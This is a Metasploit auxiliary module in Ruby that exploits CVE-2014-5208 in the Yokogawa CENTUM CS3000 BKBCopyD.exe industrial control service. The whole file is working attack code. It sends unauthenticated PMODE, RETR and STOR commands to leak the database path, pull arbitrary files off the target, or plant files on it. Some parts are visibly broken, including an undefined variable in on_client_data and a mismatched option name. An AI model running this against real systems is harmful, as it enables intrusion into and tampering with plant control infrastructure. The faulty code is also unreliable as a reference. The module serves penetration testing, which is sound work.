1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Exploit::Remote::TcpServer
9
  include Msf::Auxiliary::Report
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Yokogawa BKBCopyD.exe Client',
16
        'Description' => %q{
17
          This module allows an unauthenticated user to interact with the Yokogawa
18
          CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR
19
          operations.
20
        },
21
        'Author' => [ 'Unknown' ],
22
        'References' => [
23
          ['CVE', '2014-5208'],
24
          ['URL', 'https://www.rapid7.com/blog/post/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access']
25
        ],
26
        'Actions' => [
27
          ['PMODE', { 'Description' => 'Leak the current database' }],
28
          ['RETR', { 'Description' => 'Retrieve remote file' }],
29
          ['STOR', { 'Description' => 'Store remote file' }]
30
        ],
31
        'DisclosureDate' => '2014-08-09',
32
        'DefaultAction' => 'PMODE',
33
        'Notes' => {
34
          'Stability' => [CRASH_SAFE],
35
          'SideEffects' => [IOC_IN_LOGS],
36
          'Reliability' => []
37
        }
38
      )
39
    )
40

41
    register_options(
42
      [
43
        Opt::RPORT(20111),
44
        OptString.new('RPATH', [ false, 'The Remote Path (required to RETR and STOR)', '' ]),
45
        OptPath.new('LPATH', [ false, 'The Local Path (required to STOR)' ])
46
      ]
47
    )
48
  end
49

50
  attr_reader :srvport
51

52
  def run
53
    exploit
54
  end
55

56
  def exploit
57
    @srvport = rand(1024..65535)
58
    print_status(@srvport.to_s)
59
    # We make the client connection before giving control to the TCP Server
60
    # in order to release the src port, so the server can start correctly
61

62
    case action.name
63
    when 'PMODE'
64
      print_status('Sending PMODE packet...')
65
      data = "PMODE MR_DBPATH\n"
66
      res = send_pkt(data)
67
      if res && res =~ /^210/
68
        print_good("Success: #{res}")
69
      else
70
        print_error('Failed...')
71
      end
72
      return
73
    when 'RETR'
74
      data = "RETR #{datastore['RPATH']}\n"
75
      print_status('Sending RETR packet...')
76
      res = send_pkt(data)
77
      return unless res && res =~ /^150/
78
    when 'STOR'
79
      data = "STOR #{datastore['RPATH']}\n"
80
      print_status('Sending STOR packet...')
81
      res = send_pkt(data)
82
      return unless res && res =~ /^150/
83
    else
84
      print_error('Incorrect action')
85
      return
86
    end
87

88
    super # TCPServer :)
89
  end
90

91
  def send_pkt(data)
92
    connect(true, { 'CPORT' => @srvport })
93
    sock.put(data)
94
    sock.get_once
95
  ensure
96
    disconnect
97
  end
98

99
  def on_client_connect(client)
100
    return unless action.name == 'STOR'
101

102
    contents = ''
103
    File.new(datastore['LPATH'], 'rb') { |f| contents = f.read }
104
    print_status("#{client.peerhost} - Sending data...")
105
    client.put(contents)
106
    service.close
107
    service.stop
108
  end
109

110
  def on_client_data(_client)
111
    print_status("#{c.peerhost} - Getting data...")
112
    data = c.get_once
113
    return unless data
114

115
    if @store_path.blank?
116
      @store_path = store_loot('yokogawa.cs3000.file', 'application/octet-stream', rhost, data, datastore['PATH'])
117
      print_good("#{@store_path} saved!")
118
    else
119
      File.open(@store_path, 'ab') { |f| f.write(data) }
120
      print_good("More data on #{@store_path}")
121
    end
122
  end
123

124
  def on_client_close(_client)
125
    cleanup_service
126
  end
127
end
128

129